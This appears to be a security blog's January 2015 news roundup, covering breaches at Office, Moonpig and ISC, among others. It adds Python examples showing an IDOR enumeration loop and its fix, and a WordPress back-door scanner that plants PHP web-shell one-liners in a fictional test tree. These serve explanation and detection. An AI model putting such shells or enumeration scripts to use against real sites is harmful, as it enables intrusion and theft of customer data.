Monday, 26 January 2015

Hoax Call to Downing Street Strikes Again...

Time to review your security posture, Downing Street?
A hoax caller, claiming to be Robert Hannigan, director of the government monitoring agency GCHQ, was put through to Prime Minister David Cameron.
It is claimed that David Cameron ended the call when it became clear to him it was a hoax, and that no sensitive information was disclosed.
This comes while GCHQ is already conducting a review after Mr Hannigan's mobile phone number was disclosed during an earlier hoax call.
Even more surprisingly, the prankster managed to obtain mobile numbers for both the head of the GCHQ surveillance centre and the prime minister by bluffing his way past both sets of switchboards. The prankster went on to call the Sun newspaper to boast about his actions, claiming he had "made monkeys" out of GCHQ despite being high on drink and drugs.
We can all make mistakes and move on, but shockingly this has happened before. In 1998, radio DJ Steve Penk pretended to be Conservative leader William Hague and managed to speak to Tony Blair.
In 2002, hoaxers overwhelmed the Downing Street switchboard by tricking thousands of people into calling Number 10, asking to speak to "Tony".
It just shows that the simplest of things can slip through the net. What security review have you undertaken recently?

Tuesday, 20 January 2015

No Cinderella Story for Shoe Retailer Office

Shoe retailer Office has been warned to up its security game by the Information Commissioner's Office (ICO).

May 2014 saw Office suffer an untidy data breach which exposed more than one million customer records. This included personal data; luckily, no financial data was compromised. Office has said it has now rectified the issues.

So how did it happen? The ICO was informed that a member of the public had hacked into an unencrypted, historical Office database that was being stored on a server outside the core infrastructure of the retailer's current website.

From there, the individual gained access to the personal data of more than one million Office customers, including contact details and website passwords.

But it raises the questions: where do retailers store their data, and why? How long should it be stored? An old copy of a customer database sitting outside the systems anyone is actively securing is exactly the kind of data that should have been encrypted or, better, deleted.


Tuesday, 13 January 2015

IS-Group Hack US Centcom Twitter

The Twitter and YouTube accounts of US Central Command (Centcom) were suspended for a few hours after being hacked by a group claiming to back Islamic State.

Centcom said it was not a serious breach: there was no operational impact and no classified information was posted. Coincidentally, the hack happened at the same time as President Barack Obama was giving his speech on cyber security...

Monday, 12 January 2015

Charlie Hebdo Fallout - Anonymous Declares War on Attackers

Anonymous has declared war on jihadists after the attacks in France. The group released a video statement condemning the gun attack on the French magazine Charlie Hebdo.
'The Anonymous of all the planet have decided to declare war on you terrorists, we will track you down to the last one and will kill you. You allowed yourselves to kill innocent people, we will therefore avenge their death. We will track your activities on-line, we will close your accounts on all social media.'
The video featured the hashtag #OpCharlieHebdo, meaning Operation Charlie Hebdo.

More information at BBC News

Tuesday, 6 January 2015

Morgan Stanley Employee Reportedly Fired for Stealing 350K Client Data

Morgan Stanley has fired an employee who allegedly stole data on 350,000 clients.


The terminated employee in question was named as Galen Marsh, a 30-year-old financial advisor. Morgan Stanley realised that there was an issue on 27th December 2014, when account names, numbers and transaction data for more than 900 clients were discovered posted on the internet.

There is no evidence of financial losses to customers and Morgan Stanley has notified law enforcement and impacted customers.

How does that apply in the UK, and what are the current rules for notifying breaches? 'Organisations who provide a service allowing members of the public to send electronic messages (eg telecoms providers or internet service providers) are required to notify us if a personal data breach occurs.' (Cited and referenced from the ICO.) Note that this duty currently covers service providers of that kind, not every organisation holding personal data.

More regulations and standards are due in 2015 with the EU data protection reform.



Moonpig Flawed as Company Exposes 3 Million Records

Moonpig's brand reputation and business took a hefty hit today as a significant flaw was revealed that exposes some three million customers' personal records and partial credit card details. What's more, as the news hits the web today, it seems Moonpig knew of this almost 18 months ago. So, what happened?

The flaw, initially discovered and privately reported by developer Paul Price, meant that any account, including the holder's name, birth date, email address and street address, could be accessed simply by changing the customer identification number sent in an API request. In other words, the API authenticated the caller but never checked that the customer ID being requested belonged to that caller.

Orders could be placed under any account, and credit card expiry dates and last four digits could be plucked out through the same insecure API. Rate limiting, which would at least have slowed down a script walking through the customer ID space, was nowhere to be seen, making it an easy target for black hats, vandals and their bots.

Even more surprising is that Moonpig left the door open for so long. Price initially notified them in August 2013 and chased them in September 2014, when Moonpig promised to fix it by Christmas. Now, in 2015, the flaw remained open immediately prior to the story's publication on the Register this morning. The question is: why the lag, when this API is core to their business and there is plenty of expertise on the market to help them protect it?
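The two failures described above, as an added example that is not Moonpig's code: a constructed, in-memory "customer" endpoint in its vulnerable form (trusting the customer_id sent in the request), next to a hardened version that binds the requested id to the logged-in session and throttles each session, plus the enumeration loop an attacker's script would run against both. The endpoint shape, session tokens, rate-limit numbers and customer records are all assumptions made for the illustration.

```python
"""Insecure direct object reference (IDOR) and missing rate limiting, side by side.

Added example for this post; it is not Moonpig's code. The endpoint shape
(session token + customer_id), the record layout and the sample data are all
constructed assumptions for illustration.
"""
import time
from collections import defaultdict, deque

# Constructed sample customer table (fictional data).
CUSTOMERS = {
    1001: {"name": "Alice Example", "dob": "1980-01-01",
           "email": "alice@example.com", "card_last4": "4242", "card_expiry": "01/18"},
    1002: {"name": "Bob Example", "dob": "1975-06-30",
           "email": "bob@example.com", "card_last4": "1881", "card_expiry": "11/17"},
}

# Constructed session store: bearer token -> customer id that logged in with it.
SESSIONS = {"tok-alice": 1001, "tok-bob": 1002}


class Forbidden(Exception):
    pass


class TooManyRequests(Exception):
    pass


def get_customer_vulnerable(session_token, customer_id):
    """The flawed pattern: the caller must be logged in, but the customer_id
    taken from the request is trusted as-is, so any session can read any record."""
    if session_token not in SESSIONS:
        raise Forbidden("not logged in")
    return CUSTOMERS[customer_id]


class RateLimiter:
    """Sliding-window limiter: at most `limit` requests per `window` seconds per key.
    `clock` is injectable so the behaviour can be exercised without sleeping."""

    def __init__(self, limit, window, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window, clock
        self._hits = defaultdict(deque)

    def check(self, key):
        now = self.clock()
        hits = self._hits[key]
        while hits and now - hits[0] >= self.window:
            hits.popleft()                # drop timestamps that fell out of the window
        if len(hits) >= self.limit:
            raise TooManyRequests(f"limit of {self.limit}/{self.window}s reached for {key!r}")
        hits.append(now)


DEFAULT_LIMITER = RateLimiter(limit=60, window=60)   # assumed policy: 60 requests/minute/session


def get_customer_fixed(session_token, customer_id, limiter=DEFAULT_LIMITER):
    """Hardened version: authenticate, throttle the session, then bind the requested
    object to the authenticated principal instead of trusting the id in the request."""
    owner = SESSIONS.get(session_token)
    if owner is None:
        raise Forbidden("not logged in")
    limiter.check(session_token)          # counts every attempt, including refused ones
    if customer_id != owner:
        raise Forbidden("customer_id does not belong to this session")
    return CUSTOMERS[customer_id]


def enumerate_customers(handler, session_token, id_range):
    """What an attacker's script does: walk the id space with one valid session and
    keep whatever comes back. Gives up as soon as the server starts throttling."""
    leaked = {}
    for cid in id_range:
        try:
            leaked[cid] = handler(session_token, cid)
        except (Forbidden, KeyError):
            continue                      # wrong owner / no such id: move on
        except TooManyRequests:
            break                         # throttled: enumeration stalls here
    return leaked


if __name__ == "__main__":
    ids = range(1000, 1005)
    print("vulnerable:", sorted(enumerate_customers(get_customer_vulnerable, "tok-alice", ids)))
    print("fixed:     ", sorted(enumerate_customers(get_customer_fixed, "tok-alice", ids)))
```

Two design points worth noting: the ownership check compares the requested id against the identity the session already carries, so the client-supplied id is effectively redundant (a cleaner API would not accept it at all), and the rate limiter runs before the authorisation check so that refused attempts are counted too, since those are precisely what an enumeration script generates.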


Monday, 5 January 2015

ISC Website Compromised: Possibly a Vulnerable WordPress Plugin

The Internet Systems Consortium (ISC) website – a WordPress site – was quickly taken down last week after researchers at Cyphort Labs notified the open source software provider that its main page had been modified and was ultimately redirecting visitors to the Angler Exploit Kit.

In a Monday email correspondence, Victoria Risk, director of marketing at ISC, told SCMagazineUK.com that ISC is not certain how its website was compromised, but the organisation suspects it was through a vulnerable plugin, possibly the Slider Revolution plugin, which was being exploited recently in what is referred to as the 'SoakSoak' attacks.

“We of course read up on WordPress vulnerabilities, and read about the [SoakSoak] problem that Sucuri had published,” Risk said. “We had already removed and deleted the supposed bad plug-in by the time this Angler Exploit infection was discovered, but it is possible that the earlier compromised plug-in had already installed a back-door by the time we removed it.”

ISC does not believe it was targeted specifically, according to Risk. She said that the organisation is now redirecting visitors to other static servers where people can access all ISC resources, and she explained that ISC is rebuilding the entire website from scratch. That is the right call: once a plugin has been exploited, removing the plugin says nothing about what it left behind, and a rebuild from known-good sources is the only way to be sure.

Cited from, and more on this story at, SCMagazine.
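The point Risk makes above, that deleting the suspect plugin does not remove a back door it may already have dropped, is what an incident responder checks for before trusting a site again. The following is an added example, not ISC's or Sucuri's tooling, and it assumes nothing about what SoakSoak specifically installed. It builds a constructed, fictional WordPress-like tree in a temporary directory and applies three generic checks that plugin removal does not cover: PHP files under wp-content/uploads (which should only hold media), files carrying common obfuscated-loader patterns, and PHP files modified after the date the plugin was removed. The file names, contents and dates are all made up for the illustration.

```python
"""Looking for a left-behind back door after a WordPress plugin compromise.

Added example for this post; it is not ISC's or Sucuri's tooling and assumes
nothing about what SoakSoak actually dropped. The sample site below is a
constructed, fictional tree so that the scan runs offline.
"""
import os
import re
import tempfile
from datetime import datetime, timezone

# Generic indicators of injected PHP loaders (illustrative, not a signature set).
SUSPICIOUS = re.compile(
    rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
    rb"|preg_replace\s*\(\s*['\"][^'\"]*/e['\"]"
    rb"|assert\s*\(\s*\$_(GET|POST|REQUEST)",
)


def scan_wordpress(root, removed_at):
    """Return {relative_path: [reasons]} for files that deserve a manual look.
    removed_at is the POSIX timestamp at which the vulnerable plugin was deleted."""
    findings = {}
    uploads = os.path.join(root, "wp-content", "uploads")
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            reasons = []
            is_php = name.lower().endswith((".php", ".phtml", ".php5"))
            if is_php and path.startswith(uploads + os.sep):
                reasons.append("php under uploads")
            if is_php and os.stat(path).st_mtime > removed_at:
                reasons.append("modified after plugin removal")
            with open(path, "rb") as fh:
                if SUSPICIOUS.search(fh.read()):
                    reasons.append("obfuscated loader pattern")
            if reasons:
                findings[rel] = reasons
    return findings


def build_sample_site():
    """Construct a fictional WordPress-like tree. Returns (root, removed_at).
    Two files play the part of a dropped back door; everything else is benign."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    removed_at = datetime(2014, 12, 20, tzinfo=timezone.utc).timestamp()   # assumed removal date
    before, after = removed_at - 86400 * 30, removed_at + 86400 * 5
    files = {
        "wp-config.php": (b"<?php define('DB_NAME', 'wp'); ?>", before),
        "wp-content/themes/t/footer.php": (b"<?php wp_footer(); ?>", before),
        "wp-content/uploads/2014/12/image.jpg": (b"\xff\xd8\xff\xe0", before),
        "wp-content/uploads/2014/12/.cache.php": (b"<?php eval(base64_decode($_POST['x'])); ?>", after),
        "wp-includes/class-wp.php": (b"<?php @assert($_REQUEST['c']); // dropped\n", after),
    }
    for rel, (content, mtime) in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.utime(path, (mtime, mtime))
    return root, removed_at


if __name__ == "__main__":
    root, removed_at = build_sample_site()
    for rel, reasons in sorted(scan_wordpress(root, removed_at).items()):
        print(f"{rel}: {', '.join(reasons)}")
```

None of these checks is conclusive on its own: a legitimate update also changes mtimes, and an attacker can reset them. They are a triage list, which is why a rebuild from known-good sources, as ISC chose, remains the safe answer.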